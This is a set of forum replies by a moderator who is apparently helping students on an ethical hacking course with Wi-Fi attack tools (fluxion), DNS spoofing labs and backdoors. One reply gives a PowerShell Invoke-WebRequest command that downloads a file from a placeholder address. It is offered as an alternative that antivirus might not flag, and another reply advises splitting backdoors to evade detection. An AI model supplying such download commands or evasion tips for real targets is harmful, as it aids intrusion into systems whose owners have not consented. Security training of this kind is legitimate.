Forum Replies Created
- AuthorPosts
- Diego PérezModerator
Hi!
Can you share some screenshots of the settings used in fluxion? Can you share the results of ifconfig BEFORE running the attack?Thanks!
DiegoDiego PérezModeratorHi!
That’s the proper way to use powershell to download and execute a file, you can try to use another option, using Invoke-WebRequest, but it also might be flaged by the AV.
The command would be:
powershell iwr -uri http://<your address here> -outfile <name of the file>Try using it.
Let me know how it goes!
DiegoDiego PérezModeratorHi!
Thanks, give me a couple of days and I’ll get back to you.Greetings!
DiegoDiego PérezModeratorHi!
Yeah, in macOS you’ll need to use the command open, if you just give it the name of the file nothing will happen, as you can see in the error message it saids command not found, so it thinks that image.jpg is a command and not a file.
So inside the subprocees call just add the command open befor the name of the file. You can test it directly in macOS terminal to check that it works.Hope it helps!
DiegoDiego PérezModeratorHi!
If you want to use fluxion 2 then follow these steps:
https://github.com/hacker3983/how-to-install-pyrit-on-kali-linux-2020.1aJust don run apt-get upgrade.
Can you tell me the exact model of your adapter?(brand and model)
Greetings!
DiegoDiego PérezModeratorHi!
Hope it helped!
DiegoDiego PérezModeratorHi!
Can you post your code here? Bur use the CODE button in the interface so I can read it with the proper indentation and try it out.Let me know.
DiegoDiego PérezModeratorHi!
Cool you got it!
DiegoDiego PérezModeratorHi!
Try using this version instead:
https://github.com/FluxionNetwork/fluxionLet me know how it goes!
DiegoDiego PérezModeratorHi!
It looks like you have to install a different version, take a look at this articles:https://installlion.com/kali/kali/main/p/pidgin-otr/install/index.html
https://otr.cypherpunks.ca/Hope it helps!
DiegoDiego PérezModeratorHi!
Basically bypassing AV programs is like a game of cat and mouse, so backdoors might start getting detected at some stage, then the developers release an update, this will allow you to generate undetectable backdoors, then AV programs release an update which will make backdoors detectable ……..So you need to keep trying different things, try to split it more.
Hope it helps!
DiegoDiego PérezModeratorHi!
Yeah! That’s it, keep trying is the way.Greetings!
DiegoDiego PérezModeratorHi!
Ok, but you didn’t pay attention to what I said. Does it work as a script? This is the first step and you haven’t clarified it.Let me know.
DiegoDiego PérezModeratorHi!
There’s something strange with your network configuration, Why does your wlan0 has an ip in the rang of 10.0.0.1? Your target device is a windows virtual machine right? Is it installed in the same host as kali? Also you are missing the results of: get dns.spoof.*Let me know.
DiegoDiego PérezModeratorHi!
Cool you got it!
Diego - AuthorPosts